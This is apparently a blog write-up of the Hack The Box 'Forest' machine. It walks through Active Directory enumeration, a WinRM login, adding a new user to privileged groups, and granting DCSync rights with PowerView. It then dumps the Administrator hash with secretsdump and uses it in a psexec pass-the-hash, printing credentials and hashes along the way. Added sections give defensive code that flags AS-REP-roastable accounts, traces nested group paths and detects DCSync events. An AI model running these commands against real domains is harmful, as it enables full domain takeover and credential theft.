jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -u svc-alfresco -p s3rvice -l svc-alfresco --full
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:HTB\svc-alfresco
[+] Searching for matching DNs for term: "svc-alfresco"
[+] Using DN: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: svc-alfresco
givenName: svc-alfresco
distinguishedName: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
instanceType: 4
whenCreated: 20190920005851.0Z
whenChanged: 20260306123922.0Z
displayName: svc-alfresco
uSNCreated: 26083
memberOf: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
uSNChanged: 1048322
name: svc-alfresco
objectGUID: AhOlWHxMhkaVAtOto6+u8Q==
userAccountControl: 4260352
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 134172734821879692
logonHours: ////////////////////////////
pwdLastSet: 134172743628774723
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAALB4ltxV1shXFsPNPewQAAA==
adminCount: 1
accountExpires: 0
logonCount: 8
sAMAccountName: svc-alfresco
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 134172734821098441
msDS-SupportedEncryptionTypes: 0
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
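One thing that does pop off the page, once decoded, is `userAccountControl: 4260352`. That value is the bitwise OR of NORMAL_ACCOUNT (0x200), DONT_EXPIRE_PASSWORD (0x10000) and DONT_REQUIRE_PREAUTH (0x400000), which is exactly why GetNPUsers.py got an AS-REP for svc-alfresco and for nobody else. The `msDS-SupportedEncryptionTypes: 0` below it means no explicit enctype list is set, so the KDC falls back to defaults that on Server 2016 still include RC4, hence the etype 23 ticket that hashcat mode 18200 cracked. The decoder below is an added example (mine, not the author's or windapsearch's); the flag values are the standard Microsoft userAccountControl bits, the svc-alfresco value is the one from the dump above, and the second account in the sample is constructed with an assumed value of 512. It is the same check a defender would run over an LDAP export to find every account that is AS-REP roastable.

```python
# Added example: decode userAccountControl and flag accounts that do not
# require Kerberos pre-authentication. Flag values are the standard
# Microsoft ADS_USER_FLAG_ENUM bits.
UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0000010: "LOCKOUT",
    0x0000020: "PASSWD_NOTREQD",
    0x0000200: "NORMAL_ACCOUNT",
    0x0010000: "DONT_EXPIRE_PASSWORD",
    0x0040000: "SMARTCARD_REQUIRED",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x0100000: "NOT_DELEGATED",
    0x0200000: "USE_DES_KEY_ONLY",
    0x0400000: "DONT_REQUIRE_PREAUTH",
    0x0800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQUIRE_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x2

# Two windapsearch --full dumps cut down to the lines that matter. The first
# is svc-alfresco as shown on the page; the second is a constructed account
# with an assumed plain NORMAL_ACCOUNT value of 512.
SAMPLE_DUMPS = """\
cn: svc-alfresco
userAccountControl: 4260352
sAMAccountName: svc-alfresco
msDS-SupportedEncryptionTypes: 0
[*] Bye!
cn: sebastien
userAccountControl: 512
sAMAccountName: sebastien
[*] Bye!
"""


def decode_uac(value):
    """Names of every flag set in a userAccountControl value, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def is_asrep_roastable(value):
    """True when pre-auth is not required and the account is not disabled.

    A disabled account still carries the flag but the KDC answers
    KDC_ERR_CLIENT_REVOKED instead of an AS-REP, as the Guest and
    DefaultAccount lines in the GetNPUsers run show.
    """
    return bool(value & DONT_REQUIRE_PREAUTH) and not (value & ACCOUNTDISABLE)


def parse_full_dump(text):
    """(sAMAccountName, userAccountControl) pairs from concatenated dumps.

    Attribute order within a dump is not fixed, so the pair is only emitted
    at the '[*] Bye!' line that windapsearch prints after each object.
    """
    accounts, sam, uac = [], None, None
    for line in text.splitlines():
        if line.startswith("sAMAccountName: "):
            sam = line.split(": ", 1)[1].strip()
        elif line.startswith("userAccountControl: "):
            uac = int(line.split(": ", 1)[1].strip())
        elif line.startswith("[*] Bye!"):
            if sam is not None and uac is not None:
                accounts.append((sam, uac))
            sam, uac = None, None
    return accounts


def audit(text):
    """Map each roastable account in the dump to its decoded flags."""
    return {sam: decode_uac(uac)
            for sam, uac in parse_full_dump(text) if is_asrep_roastable(uac)}


if __name__ == "__main__":
    for sam, flags in audit(SAMPLE_DUMPS).items():
        print(f"{sam}: {', '.join(flags)}")
```

The fix on the directory side is the obvious one: clear the "Do not require Kerberos preauthentication" box on the account (nothing in this dump needs it), and set msDS-SupportedEncryptionTypes to AES only so that even a roastable account does not hand out an RC4-keyed blob.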
Nothing really pops off the page right now, but one thing I noticed is that the service account is a part of the Service Accounts group, so I'm going to do a little digging into that group:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -u svc-alfresco -p s3rvice -l "Service Accounts" --full
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:HTB\svc-alfresco
[+] Searching for matching DNs for term: "Service Accounts"
[+] Found 2 results:
0: OU=Service Accounts,DC=htb,DC=local
1: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
Which DN do you want to use? : 1
objectClass: top
objectClass: group
cn: Service Accounts
member: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
distinguishedName: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
instanceType: 4
whenCreated: 20190920010308.0Z
whenChanged: 20190923194321.0Z
uSNCreated: 26096
memberOf: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
uSNChanged: 65575
name: Service Accounts
objectGUID: 1Xwoi5KGTEi75wOrN2TQYA==
objectSid: AQUAAAAAAAUVAAAALB4ltxV1shXFsPNPfAQAAA==
adminCount: 1
sAMAccountName: Service Accounts
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 16010101000000.0Z
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
And my suspicion was correct. The Service Accounts group is part of another group called Privileged IT Accounts, which allows for remote management access!
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -u svc-alfresco -p s3rvice -l "Privileged IT Accounts" --full
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:HTB\svc-alfresco
[+] Searching for matching DNs for term: "Privileged IT Accounts"
[+] Using DN: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
objectClass: top
objectClass: group
cn: Privileged IT Accounts
member: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
distinguishedName: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
instanceType: 4
whenCreated: 20190920223502.0Z
whenChanged: 20190923194321.0Z
uSNCreated: 28777
memberOf: CN=Account Operators,CN=Builtin,DC=htb,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
uSNChanged: 65574
name: Privileged IT Accounts
objectGUID: Xu6Pvvp5W0uupXkiLK8muQ==
objectSid: AQUAAAAAAAUVAAAALB4ltxV1shXFsPNPfQQAAA==
adminCount: 1
sAMAccountName: Privileged IT Accounts
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 16010101000000.0Z
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
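The three lookups above were done by hand: svc-alfresco is in Service Accounts, Service Accounts is in Privileged IT Accounts, and Privileged IT Accounts is in the builtin Account Operators and Remote Management Users groups. None of that is visible on the user object itself, which only lists the first hop. As an added example (mine, not the author's or windapsearch's), the code below parses the `memberOf:` lines out of windapsearch --full dumps into a graph and walks it breadth-first, returning the path to every group the account reaches transitively and singling out the privileged ones. The sample input is the three dumps above reduced to their `cn:` and `memberOf:` lines; the set of groups treated as privileged is my assumption.

```python
import re
from collections import deque

# Added example: resolve nested group membership from windapsearch --full
# output. The sample is the cn/memberOf lines of the three dumps on the page.
SAMPLE_DUMPS = """\
cn: svc-alfresco
memberOf: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
[*] Bye!
cn: Service Accounts
memberOf: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
[*] Bye!
cn: Privileged IT Accounts
memberOf: CN=Account Operators,CN=Builtin,DC=htb,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
[*] Bye!
"""

# Groups whose transitive membership is worth an alert (assumed list; extend
# to whatever your environment treats as tier 0 / remote access).
PRIVILEGED_GROUPS = {
    "Administrators", "Domain Admins", "Enterprise Admins",
    "Account Operators", "Remote Management Users",
    "Exchange Windows Permissions",
}

# First RDN of a DN. Does not handle escaped commas (CN=Smith\, John),
# which would need a real DN parser.
CN_RE = re.compile(r"^CN=([^,]+)")


def member_of_graph(text):
    """Map each dumped object's cn to the CNs in its memberOf attribute."""
    graph, current = {}, None
    for line in text.splitlines():
        if line.startswith("cn: "):
            current = line[len("cn: "):].strip()
            graph.setdefault(current, [])
        elif line.startswith("memberOf: ") and current is not None:
            match = CN_RE.match(line[len("memberOf: "):].strip())
            if match:
                graph[current].append(match.group(1))
    return graph


def effective_groups(principal, graph):
    """Breadth-first walk over memberOf; returns {group: path from principal}.

    The seen set stops the walk on circular nesting, which AD allows.
    """
    paths, seen = {}, {principal}
    queue = deque([(principal, [principal])])
    while queue:
        node, path = queue.popleft()
        for group in graph.get(node, []):
            if group in seen:
                continue
            seen.add(group)
            paths[group] = path + [group]
            queue.append((group, paths[group]))
    return paths


def privileged_paths(principal, graph, privileged=PRIVILEGED_GROUPS):
    """Only the reachable groups that are on the privileged list."""
    return {g: p for g, p in effective_groups(principal, graph).items()
            if g in privileged}


if __name__ == "__main__":
    g = member_of_graph(SAMPLE_DUMPS)
    for group, path in privileged_paths("svc-alfresco", g).items():
        print(f"{group}: {' -> '.join(path)}")
```

Run against a full export rather than three hand-picked objects, this is the audit that would have caught the chain before the box was built: a service account three hops away from Account Operators, a builtin group that can manage most non-administrative users and groups, with no admin ever having added it there directly.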
Since WinRM is also open on port 5985, we can use evil-winrm to log in with the user credentials we found:
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.1.13 -u svc-alfresco -p s3rvice
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
And just like that, we've successfully grabbed the user flag:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ../
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/6/2026 4:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
***USERFLAGFOUNDHERE***
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
Now we're in the post-exploitation phase, so let's look for more information — who we are, what groups we're a part of, and what users and groups exist on the system and in the domain:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> net user
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> net group
Group Accounts for \\
-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> net localgroup
Aliases for \\FOREST
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*System Managed Accounts Group
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0>
If only you knew how long it took me to get BloodHound working. For some reason the SharpHound executable and PowerShell scripts weren't working after being uploaded, so I went with my handy tool NetExec to collect the BloodHound data instead (it might be the best tool out there, after the complications I just had):
uploading zip file
upload finished!
htb.local
First, let's confirm the computer we're on, which is forest.htb.local. From there we can check what groups we're a part of and what outbound control we have:
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $env:computername
FOREST
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
We also see another computer on the domain, EXCH01. It's part of a few groups, and one thing that stands out from the previous screenshots is that the Exchange Windows Permissions group has WriteDACL permissions:
Now if you're like me, I can be a bit forgetful. Luckily I have this mind map provided by Altered Security from the lab training I've done. It gives a good idea of what we can do with permissions like WriteDACL, GenericWrite, and others:
Thanks to altered security this helps me to visualize access
So the computer object has WriteDACL thanks to the group we're in, which means we can grant rights. Now let's enumerate the user we have a bit more:
the user we've compromised
We also see that the account is a member of the Account Operators group through the Privileged IT Accounts group. The Account Operators group has GenericAll permissions over several groups, including Exchange Windows Permissions:
this is a big mistake haha!
This allows us to add ourselves, or another user, to that group, because Privileged IT Accounts is a member of Account Operators, and Account Operators has GenericAll permissions over the Exchange Windows Permissions group.
So we can create a test user and add them to the appropriate groups, including Remote Management Users, since we want to be able to use the WinRM service:
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user tester password /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" tester /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" tester /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Now we can upload PowerView and use it to give the new user DCSync rights:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> $pass = convertto-securestring 'password' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> $cred = new-object
^C
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> $cred = new-object system.management.automation.pscredential('htb\tester' , $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> Add-ObjectACL -PrincipalIdentity tester -Credential $cred -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1>
So we should now be able to run a DCSync attack. Since we've elevated our permissions, we can use secretsdump from the Impacket suite to dump the NTLM hashes:
NOTE: secretsdump extracts NTLM hashes and Kerberos keys from a Domain Controller or a compromised machine with elevated privileges.
jbrown@Jabaris-MacBook-Pro examples % secretsdump.py htb/tester:password@10.129.1.13 -just-dc-user Administrator
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up...
jbrown@Jabaris-MacBook-Pro examples %
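Two of the steps above leave distinctive traces in the Security log of a domain controller: the `net group`/`net localgroup` additions (member-added events 4728, 4732 or 4756, depending on group scope) and the DCSync itself, which shows up as Event ID 4662 on the domain naming context carrying the DS-Replication-Get-Changes control-access rights, requested by a principal that is not a domain controller. The block below is an added example from a detection standpoint, not code from the writeup or from Impacket; the events are constructed dicts carrying a subset of those events' fields, the `FOREST$` allow-list and the watched-group list are assumptions, and the function names are this example's own.

```python
"""Detection logic for two actions in this attack path: adding an account to a
privileged group and issuing a DCSync replication request (added example).

Not part of the writeup. EVENTS are constructed dicts carrying a subset of the
fields of Windows Security Event IDs 4662 (object access) and 4728/4732/4756
(member added to a security-enabled global/local/universal group); nothing
here reads a real event log. Function names are this example's own.
"""
import re

# Well-known control-access-right GUIDs a DRSUAPI replication request needs.
# A 4662 event whose Properties field lists one of these is a replication request.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Assumed baseline: accounts allowed to replicate (the DC computer accounts,
# plus any known replication service) and groups whose changes are high-signal.
KNOWN_REPLICATORS = {"FOREST$"}
WATCHED_GROUPS = {"Exchange Windows Permissions", "Account Operators",
                  "Domain Admins", "Remote Management Users"}

# Constructed sample events in the shape of this writeup's attack path.
EVENTS = [
    {"EventID": 4728, "SubjectUserName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=tester,CN=Users,DC=htb,DC=local"},
    {"EventID": 4732, "SubjectUserName": "svc-alfresco",
     "TargetUserName": "Remote Management Users",
     "MemberName": "CN=tester,CN=Users,DC=htb,DC=local"},
    # Normal DC-to-DC replication: the subject is a domain controller account.
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectName": "DC=htb,DC=local",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # DCSync from the newly created user: same rights, non-DC subject.
    {"EventID": 4662, "SubjectUserName": "tester", "ObjectName": "DC=htb,DC=local",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary object read (user class GUID), no replication right: must not alert.
    {"EventID": 4662, "SubjectUserName": "svc-alfresco",
     "ObjectName": "CN=andy,CN=Users,DC=htb,DC=local",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(event):
    """Names of replication rights present in a 4662 event's Properties field."""
    guids = (g.lower() for g in GUID_RE.findall(event.get("Properties", "")))
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def detect_dcsync(events, known_replicators=KNOWN_REPLICATORS):
    """Flag replication requests from any principal that is not a known replicator."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        rights = replication_rights_in(e)
        if rights and e["SubjectUserName"] not in known_replicators:
            alerts.append({"rule": "dcsync", "subject": e["SubjectUserName"],
                           "rights": rights, "object": e.get("ObjectName")})
    return alerts


def detect_privileged_group_add(events, watched=WATCHED_GROUPS):
    """Flag additions to watched groups; report who did it and who was added."""
    alerts = []
    for e in events:
        if e.get("EventID") in GROUP_ADD_EVENTS and e.get("TargetUserName") in watched:
            alerts.append({"rule": "privileged-group-add", "subject": e["SubjectUserName"],
                           "group": e["TargetUserName"], "member": e["MemberName"]})
    return alerts


def run_detections(events):
    """All alerts, group changes first so the causal chain reads top to bottom."""
    return detect_privileged_group_add(events) + detect_dcsync(events)


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(alert)
```

On the constructed events this yields three alerts: the two group additions by svc-alfresco and one DCSync by `tester`, while the DC's own replication and the plain user read stay silent. The 4662 replication signal only exists if "Audit Directory Service Access" success auditing is enabled and the domain naming context's SACL covers those control-access rights, and the allow-list has to be maintained, since legitimate identity-sync services also hold replication rights.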
With this, we can use a well-known technique called Pass-the-Hash, which allows us to authenticate using the NTLM hash instead of the plaintext password. We can use psexec for this:
jbrown@Jabaris-MacBook-Pro examples % python3 psexec.py administrator@10.129.1.13 cmd.exe -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.1.13.....
[*] Found writable share ADMIN$
[*] Uploading file HlaQrAGw.exe
[*] Opening SVCManager on 10.129.1.13.....
[*] Creating service SCvD on 10.129.1.13.....
[*] Starting service SCvD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator
09/18/2019 09:09 AM .
09/18/2019 09:09 AM ..
09/20/2019 03:04 PM Contacts
09/23/2019 01:15 PM Desktop
09/23/2019 02:46 PM Documents
09/20/2019 03:04 PM Downloads
09/20/2019 03:04 PM Favorites
09/20/2019 03:04 PM Links
09/20/2019 03:04 PM Music
09/20/2019 03:04 PM Pictures
09/20/2019 03:04 PM Saved Games
09/20/2019 03:04 PM Searches
09/20/2019 03:04 PM Videos
0 File(s) 0 bytes
13 Dir(s) 10,300,977,152 bytes free
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator\Desktop
09/23/2019 01:15 PM .
09/23/2019 01:15 PM ..
03/06/2026 04:04 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 10,300,977,152 bytes free
C:\Users\Administrator\Desktop> type root.txt
***Root Flag found here***
C:\Users\Administrator\Desktop>
And just like that, we've reached the end of this machine.
Starting from simple enumeration, we were able to identify exposed services, leverage an AS-REP roasting opportunity to recover credentials, and pivot our access through group permissions in Active Directory. From there, abusing WriteDACL and delegated privileges allowed us to escalate our control, grant DCSync rights, and ultimately dump the domain hashes.
Once we had the NTLM hash, a quick Pass-the-Hash attack gave us full control — and the root flag was ours.
Another box down. On to the next.
#cybersecurity #bug-bounty #bug-bounty-writeup #red-team #penetration-testing